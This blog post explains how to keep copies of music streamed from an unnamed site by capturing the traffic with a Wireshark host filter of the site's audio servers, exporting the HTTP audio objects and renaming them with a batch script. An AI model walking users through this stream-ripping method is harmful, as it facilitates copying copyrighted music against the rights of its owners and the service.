server-ph-dc4-45-217.popularmusicsite.com or server-ph-dc4-45-218.popularmusicsite.com or server-ph-dc4-45-219.popularmusicsite.com or server-ph-dc4-45-220.popularmusicsite.com or server-ph-dc4-45-221.popularmusicsite.com or server-ph-dc4-45-222.popularmusicsite.com or server-ph-dc4-45-223.popularmusicsite.com or server-ph-dc4-45-224.popularmusicsite.com or server-ph-dc4-45-226.popularmusicsite.com or server-ph-dc4-45-227.popularmusicsite.com or server-ph-dc4-45-228.popularmusicsite.com or server-ph-dc4-45-229.popularmusicsite.com or server-ph-dc4-45-230.popularmusicsite.com or server-ph-dc4-45-232.popularmusicsite.com or server-ph-dc4-45-233.popularmusicsite.com or server-ph-dc4-45-234.popularmusicsite.com or server-ph-dc4-45-235.popularmusicsite.com or server-ph-dc4-45-236.popularmusicsite.com or server-ph-dc4-45-237.popularmusicsite.com or server-ph-dc4-45-238.popularmusicsite.com or server-ph-dc4-45-239.popularmusicsite.com or server-ph-dc4-45-240.popularmusicsite.com or server-ph-dc4-45-241.popularmusicsite.com or server-ph-dc4-45-242.popularmusicsite.com or server-ph-dc4-45-243.popularmusicsite.com or server-ph-dc4-45-244.popularmusicsite.com or server-ph-dc4-45-245.popularmusicsite.com or server-ph-dc4-45-246.popularmusicsite.com or server-ph-dc4-45-247.popularmusicsite.com or server-ph-dc4-45-248.popularmusicsite.com or server-ph-dc4-45-249.popularmusicsite.com or server-ph-dc4-45-250.popularmusicsite.com or server-ph-dc4-45-251.popularmusicsite.com or server-ph-dc4-45-252.popularmusicsite.com or server-ph-dc4-45-253.popularmusicsite.com or server-ph-dc4-45-254.popularmusicsite.com or dc6-e-1-208-85-46-1.popularmusicsite.com or dc6-e-2-208-85-46-2.popularmusicsite.com or dc6-e-2-208-85-46-3.popularmusicsite.com or dc6-e-2-208-85-46-4.popularmusicsite.com or dc6-e-2-208-85-46-5.popularmusicsite.com or dc6-e-2-208-85-46-6.popularmusicsite.com or dc6-e-2-208-85-46-7.popularmusicsite.com or dc6-e-2-208-85-46-8.popularmusicsite.com or dc6-e-2-208-85-46-9.popularmusicsite.com or dc6-e-2-208-85-46-10.popularmusicsite.com or dc6-e-2-208-85-46-11.popularmusicsite.com or dc6-e-2-208-85-46-12.popularmusicsite.com or dc6-e-2-208-85-46-13.popularmusicsite.com or mediaserver-dc6-t1-1.popularmusicsite.com or mediaserver-dc6-t1-2.popularmusicsite.com or mediaserver-dc6-t1-3.popularmusicsite.com or mediaserver-dc6-t1-4.popularmusicsite.com or mediaserver-dc6-t2-1.popularmusicsite.com or mediaserver-dc6-t2-2.popularmusicsite.com or mediaserver-dc6-t2-3.popularmusicsite.com or mediaserver-dc6-t2-4.popularmusicsite.com or mediaserver-dc6-t3-1.popularmusicsite.com or mediaserver-dc6-t3-2.popularmusicsite.com or mediaserver-dc6-t3-3.popularmusicsite.com or mediaserver-dc6-t3-4.popularmusicsite.com<br />
<br />
<br />
If you take the time I'm sure you can figure out what popularmusicsite.com is.<br />
<br />
This particular popular music site separates out their audio media servers and their ad media servers so you can specify specifically just audio servers. You could grab everything with a net src filter with the IP block but that's not what I was trying to accomplish. This filter should be just audio files captured.<br />
<br />
So that's pretty much it, just go listen to music for a few hours and keep a copy of everything you listened to. <br />
<br />
Open your pcap file in wireshark, click on File -> Export -> Objects -> HTTP<br />
You should have nothing but audio/mp4 listed in the content type.<br />
Click Save All, save them to a folder.<br />
You'll then need to rename all the files and add the extension .mp4<br />
<br />
Sounds like a lot of legwork renaming all those files since they have a bunch of odd characters in their names, would be a good job for a script...<br />
<br />
Place this script one directory up, change blar to whatever the directory name is that you have all your exported music in.<br />
<br />
-=Script=-<br />
<br />
@echo off<br />
setlocal EnableDelayedExpansion<br />
dir /b .\blar >> output.txt<br />
for /f %%a in (output.txt) do (<br />
set t=!random!<br />
ren ".\blar\%%a" "!t!.mp4"<br />
)<br />
del /f /q output.txt<br />
Echo Done..<br />
pause<br />
<br />
<br />
This will give you a random number as a name for all files and tag the .mp4 extension on there.<br />
Winamp's autotag does a good job of getting the meta data updated on the files. I don't know of anything that will change the actual filename based on the metadata. If you do, post a comment.<br />
<br />
==Update==<br />
Comment posted suggests using MP3Tag, it works perfectly. <br />
<br />
<br />Unknownnoreply@blogger.com1